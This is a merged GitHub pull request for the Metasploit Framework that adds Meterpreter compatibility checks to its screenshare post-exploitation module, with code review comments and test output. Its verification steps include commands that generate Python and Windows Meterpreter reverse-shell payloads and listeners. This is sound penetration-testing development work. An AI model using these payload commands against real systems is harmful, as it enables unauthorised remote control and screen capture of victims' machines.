Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add meterpreter compatibility metadata to screenshare module #15669

Merged
merged 3 commits into from
Sep 27, 2021
Merged

Add meterpreter compatibility metadata to screenshare module #15669

merged 3 commits into from
Sep 27, 2021

Conversation

adfoster-r7
Copy link
Contributor

@adfoster-r7 adfoster-r7 commented Sep 13, 2021
edited
Loading

Building on the work of #15295 and #15659

Verification

  1. Get a Python shell:
use payload/python/meterpreter_reverse_tcp
set LHOST 192.168.123.1
generate -o shell.py -f raw
to_handler

Verify validation works as expected:

use multi/manage/screenshare
run session=-1

Expected output:

[!] SESSION may not be compatible with this module (missing Meterpreter features: stdapi_ui_desktop_screenshot, stdapi_ui_send_keyevent, stdapi_ui_send_mouse, espia_image_get_dev_screen)
[] Using URL: http://127.0.0.1:8080/aKK5njyTRRh
[] Server started.

  1. Get a windows shell:
use windows/meterpreter/reverse_https
set LHOST 192.168.123.1
set LPORT 4444
set SessionCommunicationTimeout 0
set ExitOnSession false

# Create the executable tun on on the VM
generate -o reverse.exe -f exe

# Create listener
to_handler

Verify validation works as expected:

use multi/manage/screenshare
run session=-1

Expected output:

adfoster-r7
adfoster-r7 commented Sep 13, 2021
View reviewed changes
lib/msf/core/post_mixin.rb
end
end
missing_cmd_ids -= s.commands
return "missing Meterpreter features: #{command_names_for(missing_cmd_ids)}" unless missing_cmd_ids.empty?
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This was just extracted into a method below, and it returns an array of issues instead of a string

adfoster-r7
adfoster-r7 commented Sep 13, 2021
View reviewed changes
lib/msf/core/post_mixin.rb
end

# Arch is okay, now check the platform.
if self.platform && self.platform.kind_of?(Msf::Module::PlatformList)
return "incompatible session platform: #{s.platform}" unless self.platform.supports?(Msf::Module::PlatformList.transform(s.platform))
issues << "incompatible session platform: #{s.platform}" unless self.platform.supports?(Msf::Module::PlatformList.transform(s.platform))
Copy link
Contributor Author

@adfoster-r7 adfoster-r7 Sep 13, 2021
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I wanted to return the potential platform issue, as well as the meterpreter issues, so returning early wasn't the right pattern here for me.

Potential example:

[!] SESSION may not be compatible with this module (incompatible session platform: linux. missing Meterpreter features: stdapi_ui_desktop_screenshot, stdapi_ui_send_keyevent, stdapi_ui_send_mouse, espia_image_get_dev_screen)
[] Using URL: http://127.0.0.1:8080/WNOheBiKs
[] Server started.

@jmartin-tech
Copy link
Contributor

Error from sanity test run for Linux meterpreter:

[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/linux-x64-meterpreter_reverse_tcp-192x168x16x127-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/linux-x64-meterpreter_reverse_tcp-192x168x16x127-30001.rc)> run
[*] Setup: changing working directory to /tmp
[-] Post failed: NameError undefined local variable or method `s' for #<Msf::Modules::Post__Test__Meterpreter::MetasploitModule:0x00007f60aa51e3e0>
[-] Call stack:
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post_mixin.rb:311:in `meterpreter_session_incompatibility_reasons'
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post_mixin.rb:215:in `session_incompatibility_reasons'
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post_mixin.rb:52:in `setup'
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post.rb:28:in `setup'
[-]   /home/msfuser/rapid7/metasploit-framework/test/modules/post/test/meterpreter.rb:47:in `setup'
[*] Cleanup: changing working directory back to /home/vagrant/payload_test
[*] Cleanup: changing working directory back to /home/vagrant/payload_test
[*] Post module execution completed

@adfoster-r7 adfoster-r7 force-pushed the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch 2 times, most recently from 23d5589 to 49db8b9 Compare September 14, 2021 10:17
smcintyre-r7
smcintyre-r7 reviewed Sep 14, 2021
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Changes look good, just left a few general comments.

lib/msf/core/post_mixin.rb Outdated Show resolved Hide resolved
modules/post/multi/manage/screenshare.rb Outdated Show resolved Hide resolved
@adfoster-r7 adfoster-r7 force-pushed the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch from 49db8b9 to 6072382 Compare September 15, 2021 16:43
@adfoster-r7 adfoster-r7 force-pushed the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch from 797673b to e81f1b5 Compare September 23, 2021 20:10
@adfoster-r7 adfoster-r7 merged commit 959527a into rapid7:master Sep 27, 2021
@adfoster-r7 adfoster-r7 deleted the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch September 27, 2021 14:18
@adfoster-r7
Copy link
Contributor Author

Release Notes

Updates the multi/manage/screenshare module to use the Espia screenshot capabilities if present, and to gracefully fallback to using the normal screenshot behavior if it fails to load as expected.

@erran-r7 erran-r7 added the rn-enhancement release notes enhancement label Oct 1, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@timwr timwr timwr left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

@gwillcox-r7 gwillcox-r7 gwillcox-r7 approved these changes

Assignees
No one assigned
Labels
enhancement library module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
6 participants
@adfoster-r7 @jmartin-tech @timwr @smcintyre-r7 @gwillcox-r7 @erran-r7